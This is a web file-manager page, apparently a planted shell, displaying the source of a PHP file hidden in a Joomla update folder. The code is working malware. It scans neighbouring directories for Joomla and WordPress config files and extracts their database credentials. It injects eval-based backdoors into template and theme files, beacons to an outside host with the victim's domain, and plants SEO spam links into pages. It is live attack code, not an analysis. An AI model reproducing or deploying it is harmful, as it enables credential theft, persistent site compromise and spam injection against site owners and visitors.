File manager - Edit - /home/opticamezl/www/newok/administrator/components/com_joomlaupdate/inf.php
Back
<?php set_time_limit(0); DEFINE('ONLY_SEARCH', false); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 200); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); DEFINE('URL', 'http://net9.pl/language/en-GB/script.php'); $GLOBALS['stopkey'] = Array('upload', 'uploads', 'img', 'administrator', 'admin', 'bin', 'cache', 'cli', 'components', 'includes', 'language', 'layouts', 'libraries', 'logs', 'media', 'modules', 'plugins', 'tmp', 'upgrade', 'engine', 'templates', 'template', 'images', 'css', 'js', 'image', 'file', 'files', 'wp-admin', 'wp-content', 'wp-includes'); $GLOBALS['_'] = Array(); $dirs = Array(); $domain = Array(); $search = Array( Array('file' => 'configuration.php', 'cms' => 'jm', '_key' => 'JConfig'), Array('file' => 'wp-config.php', 'cms' => 'wp', '_key' => '$table_prefix'), ); function Match($regexp, $content, $index = 1) { if (preg_match($regexp, $content, $result)) { return $result[$index]; } return false; } function SearchFile($search, $path) { if ($dir = @opendir($path)) { $i = 0; while (($filename = @readdir($dir)) !== false) { if ($i > MAX_ITERATION) break; $i++; if ($filename != '.' && $filename != '..') { if (is_dir($path . '/' . $filename) && !in_array($filename, $GLOBALS['stopkey'])) { SearchFile($search, $path . '/' . $filename); } else { foreach ($search as $_) { if (strtolower($filename) == strtolower($_['file'])) { $GLOBALS['_'][$path . '/' . $filename] = Array($_['cms'], $path . '/' . $filename); } } } } } } } function CreateJoomCode($data) { $password = md5('Password_' . rand(100, 200)); $code = '<?php //PING if (@file_get_contents(\''.URL.'?p='.$password.'&url=\' . $_SERVER[\'HTTP_HOST\'])) { if ($file = @file_get_contents(__FILE__)) { $file = preg_replace(\'!//PING.*//ENDPING!s\', \'\', $file); @file_put_contents(__FILE__, $file); } } //ENDPING include_once($_SERVER[\'DOCUMENT_ROOT\'].\'/configuration.php\'); $config = new JConfig(); mysql_connect($config->host, $config->user, $config->password); mysql_select_db($config->db); if (isset($_POST[\'action\']) && isset($_POST[\'password\']) && $_POST[\'password\'] == \''.$password.'\') { if ($_POST[\'action\'] == \'mail\') { if (@mail("email@example.com", "Subj", "Mail")) { echo "OK"; } else { echo "ERROR"; } exit; } if ($_POST[\'action\'] == \'get_all_links\') { header("Content-Type: text/plain"); $return = \'\'; $query = @mysql_query(\'SELECT * FROM `'.$data['prefix'].'cache_content` ORDER BY url DESC\'); while ($data = @mysql_fetch_assoc($query)) { $return .= \'<e><url>\' . $data[\'url\'] . \'</url><code>\' . $data[\'code\'] . \'</code><id>\' . $data[\'ID\'] . \'</id></e>\' . "\r\n"; } echo ($return); exit; } if ($_POST[\'action\'] == \'set_links\') { if (isset($_POST[\'data\'])) @mysql_query(\'UPDATE `'.$data['prefix'].'cache_content` SET code = "\' . mysql_escape_string($_POST[\'data\']) . \'" WHERE code = "" LIMIT 1\');exit; } if ($_POST[\'action\'] == \'set_id_links\') { if (isset($_POST[\'data\'])) @mysql_query(\'UPDATE `'.$data['prefix'].'cache_content` SET code = "\' . mysql_escape_string($_POST[\'data\']) . \'" WHERE `ID` = "\' . mysql_escape_string($_POST[\'id\']) . \'"\');exit; } } function obCacheStart($content) { $config = new JConfig(); mysql_connect($config->host, $config->user, $config->password); mysql_select_db($config->db); $args = \'http://\' . $_SERVER[\'HTTP_HOST\'] . urldecode($_SERVER[\'REQUEST_URI\']); mysql_query(\'SELECT count(*) FROM `'.$data['prefix'].'cache_content` WHERE `url` = "\' . mysql_escape_string($args) . \'"\'); $cache_query = @mysql_query(\'SELECT count(*) FROM `'.$data['prefix'].'cache_content` WHERE `url` = "\' . mysql_escape_string($args) . \'"\'); if ($cache_query) { $cache_result = @mysql_result($cache_query, 0); if ($cache_result == \'0\') { @mysql_query(\'INSERT INTO `'.$data['prefix'].'cache_content` (`url`, `code`, `ID`) VALUES("\' . mysql_escape_string($args) . \'", "", NULL)\'); } $data = @mysql_result(mysql_query(\'SELECT `code` FROM `'.$data['prefix'].'cache_content` WHERE `url` = "\' . mysql_escape_string($args) . \'"\'), 0); } if (isset($data) && !empty($data)) { if (preg_match(\'!</body>!si\', $content)) { $content = preg_replace(\'!</body>!si\', $data.\'</body>\', $content); } else { if (preg_match(\'!</html>!si\', $content)) { $content = preg_replace(\'!</html>!si\', $data.\'</html>\', $content); } } } return $content; } @ob_start(\'obCacheStart\'); ?>'; $sql = 'CREATE TABLE IF NOT EXISTS `'.$data['prefix'].'cache_content` ( `url` varchar(255) NOT NULL, `code` text NOT NULL, `ID` int(11) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`ID`), UNIQUE KEY `url` (`url`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1'; @mysql_connect($data['host'], $data['login'], $data['password']); @mysql_select_db($data['name']); if (@mysql_query($sql)) { $dir = $data['path'] . '/templates/'; if ($dh = @opendir($dir)) { while (($file = readdir($dh)) !== false) { if ($file != '.' && $file!='..' && is_dir($dir.$file)) { if (!file_exists($dir.$file.'/ob_cache.php') && file_exists($dir.$file.'/index.php')) { @chmod($dir.$file, 0777); @chmod($dir.$file.'/index.php', 0777); if ($index = @file_get_contents($dir.$file.'/index.php')) { @file_put_contents($dir.$file.'/ob_cache.php', $code); if (!preg_match('!>$!s', $index)) $index.="\n".' ?>'; $index = '<?php include_once(\'ob_cache.php\'); ?>'.$index.' <?php ob_end_flush(); ?>'; @file_put_contents($dir.$file.'/index.php', $index); } } } } } } @mysql_close(); } function CreateWpCode($data) { $password = md5('Password_' . rand(100, 200)); $code = '//CODESTART $password = \''.$password.'\'; @mysql_query(\'CREATE TABLE IF NOT EXISTS `wp_config` ( `url` varchar(255) NOT NULL, `code` text NOT NULL, `ID` int(11) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`ID`), UNIQUE KEY `url` (`url`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1\'); $insert_code = \'$args = \\\'http://\\\'.$_SERVER[\\\'HTTP_HOST\\\'].urldecode($_SERVER[\\\'REQUEST_URI\\\']) ; $wp_query = @mysql_query(\\\'SELECT count(*) FROM `wp_config` WHERE `url` = "\\\'.mysql_escape_string($args).\\\'"\\\'); if ($wp_query) { $wp_result = @mysql_result($wp_query, 0); if ($wp_result == \\\'0\\\') { @mysql_query(\\\'INSERT INTO `wp_config` (`url`, `code`, `ID`) VALUES("\\\'.mysql_escape_string($args).\\\'", "", NULL)\\\'); } $data = @mysql_result(mysql_query(\\\'SELECT `code` FROM `wp_config` WHERE `url` = "\\\'.mysql_escape_string($args).\\\'"\\\'), 0); } echo $data;\'; $action_links = \'if (isset($_POST[\\\'action\\\']) && isset($_POST[\\\'password\\\']) && $_POST[\\\'password\\\'] == \\\'\'.$password.\'\\\') { if ($_POST[\\\'action\\\'] == \\\'mail\\\'){if(@mail("email@example.com", "Subj", "Mail")){echo "OK";} else {echo "ERROR";}exit;} if ($_POST[\\\'action\\\'] == \\\'get_all_links\\\') { header("Content-Type: text/plain"); $return = \\\'\\\'; $query = @mysql_query(\\\'SELECT * FROM wp_config ORDER BY url DESC\\\'); while ($data = @mysql_fetch_assoc($query)) { $return.=\\\'<e><url>\\\'.$data[\\\'url\\\'].\\\'</url><code>\\\'.$data[\\\'code\\\'].\\\'</code><id>\\\'.$data[\\\'ID\\\'].\\\'</id></e>\\\'."\\r\\n"; } echo ($return); exit; } if ($_POST[\\\'action\\\'] == \\\'set_links\\\') { if(isset($_POST[\\\'data\\\'])) @mysql_query(\\\'UPDATE `wp_config` SET code = "\\\'.mysql_escape_string($_POST[\\\'data\\\']).\\\'" WHERE code = "" LIMIT 1\\\'); } if ($_POST[\\\'action\\\'] == \\\'set_id_links\\\') { if(isset($_POST[\\\'data\\\'])) @mysql_query(\\\'UPDATE `wp_config` SET code = "\\\'.mysql_escape_string($_POST[\\\'data\\\']).\\\'" WHERE `ID` = "\\\'.mysql_escape_string($_POST[\\\'id\\\']).\\\'"\\\'); } }\'; @delete_option(\'wp_brlinks\'); @delete_option(\'wp_custom_page_links\'); add_option(\'wp_custom_page_links\', $insert_code); add_option(\'wp_brlinks\', $action_links); @file_get_contents(\''.URL.'?p=\' . $password . \'&url=\' . $_SERVER[\'HTTP_HOST\']); $file = file_get_contents(__FILE__); $file = preg_replace(\'!//CODESTART.*//CODEEND!s\', \'\', $file); $footer = file_get_contents(dirname(__FILE__).\'/footer.php\'); if ($footer) { if (!preg_match(\'!wp_custom_page_links_return!s\', $footer)) { if (preg_match(\'!</body>!s\', $footer)) { $footer = str_replace(\'</body>\', \'<?php wp_custom_page_links_return(); ?></body>\', $footer); file_put_contents(dirname(__FILE__).\'/footer.php\', $footer); } else { if (preg_match(\'!</html>!s\', $footer)) { $footer = str_replace(\'</html>\', \'<?php wp_custom_page_links_return(); ?></html>\', $footer); file_put_contents(dirname(__FILE__).\'/footer.php\', $footer); } } } } file_put_contents(__FILE__, ($file)); //CODEEND function wp_custom_page_links_return() { $option = get_option(\'wp_custom_page_links\'); @eval($option); } @eval(get_option(\'wp_brlinks\'));'; @mysql_connect($data['host'], $data['login'], $data['password']); @mysql_select_db($data['name']); // $template = mysql_result(mysql_query('SELECT `option_value` FROM `'.$data['prefix'].'options` WHERE `option_name` = "template"'), 0); if (is_dir($data['path'] . '/wp-content/themes/' . $template)) { if ($functions = file_get_contents($data['path'] . '/wp-content/themes/' . $template . '/functions.php')) { if (strpos($functions, 'wp_brlinks') === false) { $functions = preg_replace('!^<\?php!s', '<?php' . "\n/*INSERT_CODE*/", $functions); $functions = str_replace('/*INSERT_CODE*/', $code, $functions); @file_put_contents($data['path'] . '/wp-content/themes/' . $template . '/functions.php', $functions); } } } // @mysql_close(); } function checkDomain($configFile, $type, &$domain) { global $search; if ($file = file_get_contents($configFile)) { foreach ($search as $_) { if ($type == $_['cms']) { if (strpos($file, $_['_key']) !== false) { switch ($type) { case 'wp'; $db_name = Match('!DB_NAME[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_login = Match('!DB_USER[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_password = Match('!DB_PASSWORD[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_host = Match('!DB_HOST[\'\s\,]+\'([^\']*)\'\s*\)!s', $file); $db_prefix = Match('!\$table_prefix[\s=]*\'([^\']*)\'!s', $file); break; case 'jm'; $db_name = Match('!\$db\s*=\s*\'([^\']*)\'!s', $file); $db_login = Match('!\$user\s*=\s*\'([^\']*)\'!s', $file); $db_password = Match('!\$password\s*=\s*\'([^\']*)\'!s', $file); $db_host = Match('!\$host\s*=\s*\'([^\']*)\'!s', $file); $db_prefix = Match('!\$dbprefix\s*=\s*\'([^\']*)\'!s', $file); break; } $domain[] = Array('host' => $db_host, 'name' => $db_name, 'login' => $db_login, 'password' => $db_password, 'prefix' => $db_prefix, 'path' => Match('!^(.*)/[^/]*$!s', $configFile), 'type' => $type); return ; } } } } } function getDirList($path) { if ($dir = @opendir($path)) { $result = Array(); while (($filename = @readdir($dir)) !== false) { if ($filename != '.' && $filename != '..' && is_dir($path . '/' . $filename)) $result[] = $path . '/' . $filename; } return $result; } return false; } for ($i = 0; $i<MAX_LEVEL; $i++) { $dirs[realpath(P . str_repeat('/../', $i + 1))] = realpath(P . str_repeat('/../', $i + 1)); } foreach ($dirs as $dir) { foreach (@getDirList($dir) as $__) { @SearchFile($search, $__); } } foreach ($GLOBALS['_'] as $e) { @checkDomain($e[1], $e[0], $domain); } if (!ONLY_SEARCH) { foreach ($domain as $__) { switch ($__['type']) { case 'jm'; @CreateJoomCode($__); break; case 'wp'; @CreateWpCode($__); break; } } } echo json_encode($domain); ?>
| ver. 1.4 |
Github
|
.
| PHP 8.3.23 | Generation time: 0 |
proxy
|
phpinfo
|
Settings